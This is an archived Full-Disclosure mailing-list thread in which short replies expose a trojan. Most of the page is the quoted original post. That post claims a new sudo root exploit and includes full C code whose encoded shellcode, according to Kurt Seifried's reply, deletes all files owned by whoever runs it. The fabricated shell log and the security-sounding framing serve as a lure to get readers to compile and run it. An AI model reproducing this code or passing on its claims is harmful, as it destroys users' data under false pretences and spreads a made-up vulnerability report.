| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue Aug 2 03:58:06 2005
From: iago at valhallalegends.com (Ron)
Subject: Undisclosed Sudo Vulnerability ?
Haha nice, I was just getting ready to run it on my sacrificial VMWare
box, but you saved me the trouble of hitting "undo" :-)
Kurt Seifried wrote:
> This is a trojan that will nuke all the files owned by the user running it.
>
> -Kurt
>
> ----- Original Message ----- From: "Esler, Joel - Contractor"
> <joel.esler@...rt-s.army.mil>
> To: <full-disclosure@...ts.grok.org.uk>
> Sent: Saturday, July 30, 2005 12:40 PM
> Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
>
>
>> About two weeks ago, our proprietary LIDS detected some suspicious shell
>> activity on an internal .mil machine i am in charged of. Our server runs
>> latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
>> Before shutting down the machine and reinstalling it from scratch, we
>> installed sebek module to monitor all shell activity. Based on the data
>> we gathered, it seems the attacker gained root privileges using an
>> undisclosed bug in latest sudo.
>>
>> $ uname -a
>> Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686
>> GNU/Linux
>>
>> $ sudo -V
>> Sudo version 1.6.8p9
>>
>> $ ls -al /tmp/.phc
>> -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc
>>
>> Here is an excerpt of a shell session we recorded:
>>
>> <.........>
>> $ cat >blaat.uue<<'EH'
>>
>
>
> --------------------------------------------------------------------------------
>
>
>
>> EH
>> $ uudecode blaat.uue
>> $ cat sudoh.c
>> /*
>> * off by one ebp overwrite in sudo prompt parsing func (bground mode
>> only)
>> *
>> * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard
>> Johnson
>> *
>> * gcc -pipe -o sudoh sudoh.c ; ./sudoh
>> *
>> * happy deathday route
>> *
>> */
>>
>> #include <stdio.h>
>> #include <unistd.h>
>> #include <string.h>
>> #include <alloca.h>
>>
>>
>> #define SUDO_PROMPT "%u@%h> \\%"
>> #define shellcode esp
>> #define RETS_NUM 246 /* generic */
>> #define NOPS_NUM 116 /* generic */
>>
>>
>> /*
>> * Linux x86 non-interactive exec
>> * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
>> */
>>
>> char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
>> = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
>> "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
>> "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
>> "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
>> "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
>> "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
>> "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
>> "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
>> /* = "\xcc\xeb\xfe"; */
>>
>>
>>
>> void fill (char *buff, int size, unsigned long val)
>> {
>> unsigned long *ptr = (unsigned long *) buff;
>>
>> for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ =
>> val;
>> }
>>
>>
>> unsigned long get_sp (void)
>> {
>> __asm__ ("lea esp, %eax");
>> }
>>
>>
>> char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
>> {
>> int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums +
>> strlen (shellcode);
>> unsigned char *nops = alloca (nops_nums);
>> unsigned char *rets = alloca (rets_nums);
>> unsigned long ret = get_sp ();
>> static char exp_buffer [8192];
>>
>> /* make sure sudo isatty() fails */
>> close (0); close (1); close (2);
>>
>> fill (nops, (unsigned char) nops_nums, 0x90909090);
>> fill (rets, (unsigned char) rets_nums, ret);
>>
>> /* be nice plz */
>> if (size > sizeof (exp_buffer)) {
>> fprintf (stderr, "buffer's t00 small..\n");
>> return NULL;
>> }
>>
>> snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
>> SUDO_PROMPT, /* evilz prompt */
>> nops,
>> shellcode,
>> rets);
>>
>> /* exploit buff */
>> return exp_buffer;
>> }
>>
>>
>>
>> int main(int argv, char *argc[])
>> {
>> char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
>>
>> /* thanks again T0dd :) */
>>
>> execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
>> "/bin/false", NULL);
>>
>> /* ok, shellroot should await you @ "HISTFILE=/dev/null
>> /tmp/.phc -p" */
>>
>> return 0;
>> }
>>
>> $ gcc -pipe -o sudoh sudoh.c
>> {standard input}: Assembler messages:
>> {standard input}:5: Warning: Ignoring changed section attributes for
>> .text
>> $ ./sudoh
>> $ cat /bin/cat > blaat.uue; rm blaat.uue
>> $ cat /bin/cat > sudoh.c; rm sudoh.c
>> $ cat /bin/cat > sudoh; rm sudoh
>> $ HISTFILE=/dev/null /tmp/.phc -p
>> id
>> uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
>> <.........>
>>
>>
>> Todd Miller, the maintainer of Sudo has been informed yesterday, and it
>> is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
>>
>>
>> J
>>
>> Joel Esler, GCIA
>> joel.esler@...rt-s.army.mil
>> 706-791-7165 DSN: 780-7165
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
Powered by blists - more mailing lists